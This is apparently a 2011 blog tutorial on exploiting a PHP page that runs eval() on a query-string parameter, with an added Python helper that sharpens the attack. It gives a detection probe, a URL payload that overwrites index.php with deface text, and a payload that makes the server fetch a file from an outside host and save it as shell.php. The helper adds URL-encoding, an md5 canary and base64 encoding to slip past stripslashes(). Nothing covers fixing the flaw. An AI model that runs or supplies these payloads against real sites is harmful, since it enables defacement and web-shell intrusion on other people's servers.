Saturday 5 March 2011

Deface using EVAL() function



"Eval() is a PHP function that allows a given string to be interpreted as PHP code. Because eval() is often used in web applications, and although interpretation of the string is widely manipulated, eval() most of the time serves to execute PHP code contained in a previously defined variable.
The problem is that if eval() executes a variable whose content you can modify, PHP's eval() will execute that code as is. Reminder: eval() allows the execution of a given string as PHP code, but it does not write its content to this page or others (unless the code itself does so); it merely executes it and displays the result."

OK, this is our vulnerable page:

<?php
// Deliberately vulnerable page from the post: the query-string value flows straight into eval().
$Ev = $_GET['ev'];
$eva = stripslashes($Ev); // undoes magic_quotes_gpc; with magic quotes off it also removes any backslash in the payload
eval($eva);               // attacker-supplied PHP runs with the web server's privileges
?>
Now let's get to the interesting part. To start, we need to test whether the page is vulnerable by requesting:
http://mytargettest.com/hacktest/index.php?ev=phpinfo();
If you see the phpinfo() page, the string was executed as PHP and we can exploit it. (If phpinfo is listed in disable_functions the page shows nothing, so a blank response is not proof that eval() is absent; echoing a value you chose is a more reliable check.)
Now let's see what we can do. Note that the payloads below contain characters such as $, quotes and ; that a browser may mangle, so URL-encode them if a request does not behave as expected.
1) You can deface index.php directly with this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced by Hacker"));fclose($z);

2) Or you can write a shell onto the server with this URL (the target fetches your file and saves it as shell.php) -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z);

3) Browse to your shell: http://mytargettest.com/hacktest/shell.php
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)
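The probing and file-writing steps above, as an added example that is not part of the original post: a small Python helper that URL-encodes the payload so that $, quotes, ; and parentheses arrive intact in $_GET, checks for an echoed md5 canary instead of relying on phpinfo() (which goes beyond the post's test and still works where phpinfo is disabled), and base64-encodes the content written to disk so that the target's stripslashes() call cannot eat a backslash out of the payload. The hostname and the ev parameter are the post's own placeholders; the response bodies used when checking are constructed, and nothing here contacts a server.

```python
"""Added example (not from the original post): helpers for testing and
exploiting the eval($_GET['ev']) page shown above.

Assumptions: TARGET and PARAM are the post's placeholders; the canary and
base64 tricks are this example's own additions, not the post's method."""
import base64
import hashlib
from urllib.parse import urlencode

TARGET = "http://mytargettest.com/hacktest/index.php"  # placeholder from the post
PARAM = "ev"


def build_probe_url(php_code, base_url=TARGET, param=PARAM):
    """Return base_url?param=<php_code> with the code percent-encoded.

    Pasting raw PHP into the address bar works in some browsers, but '$',
    quotes, ';' and '(' are not safe in a query string; urlencode() encodes
    them so PHP's $_GET receives exactly the code we wrote."""
    return base_url + "?" + urlencode({param: php_code})


def canary_payload(seed):
    """PHP code that echoes md5(seed), plus the marker we expect back.

    Seeing the md5 of a value we chose proves the string was executed (not
    merely reflected) and does not depend on phpinfo() being enabled."""
    marker = hashlib.md5(seed.encode()).hexdigest()
    return 'echo md5("%s");' % seed, marker


def response_shows_eval(body, marker):
    """True if the canary marker appears in the HTTP response body."""
    return marker in body


def write_file_payload(filename, content):
    """The post's fopen/fwrite/fclose chain, with the content base64-encoded.

    The target runs stripslashes() on our input, so any backslash in the
    payload would be removed; base64 output contains no quotes, backslashes
    or '$', so arbitrary content survives both stripslashes() and PHP quoting."""
    b64 = base64.b64encode(content.encode()).decode()
    return ("$z=fopen('%s','w');fwrite($z,base64_decode('%s'));fclose($z);"
            % (filename, b64))


def fetch_file_payload(filename, url):
    """Write the body fetched from a remote URL to filename (the post's step 2)."""
    return ("$z=fopen('%s','w');fwrite($z,file_get_contents('%s'));fclose($z);"
            % (filename, url))


if __name__ == "__main__":
    code, marker = canary_payload("evaltest")
    print("probe URL:     ", build_probe_url(code))
    print("expected marker:", marker)
    print("deface URL:    ", build_probe_url(write_file_payload("index.php", "Defaced by Hacker")))
    print("shell URL:     ", build_probe_url(fetch_file_payload("shell.php", "http://172.16.1.79/exploits/back.txt")))
```

Feed the probe URL to a browser or curl, and compare the body against the marker with response_shows_eval(); the deface and shell URLs are the post's steps 1 and 2 in encoded form.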

4 comments:

  1. Very nice tutorial.
    The question is, how do we know whether the website parses a variable using eval() in the PHP script?
    How do we test for the eval() vuln?

    Thank you :)
  2. By using a Web Vulnerability Scanner.
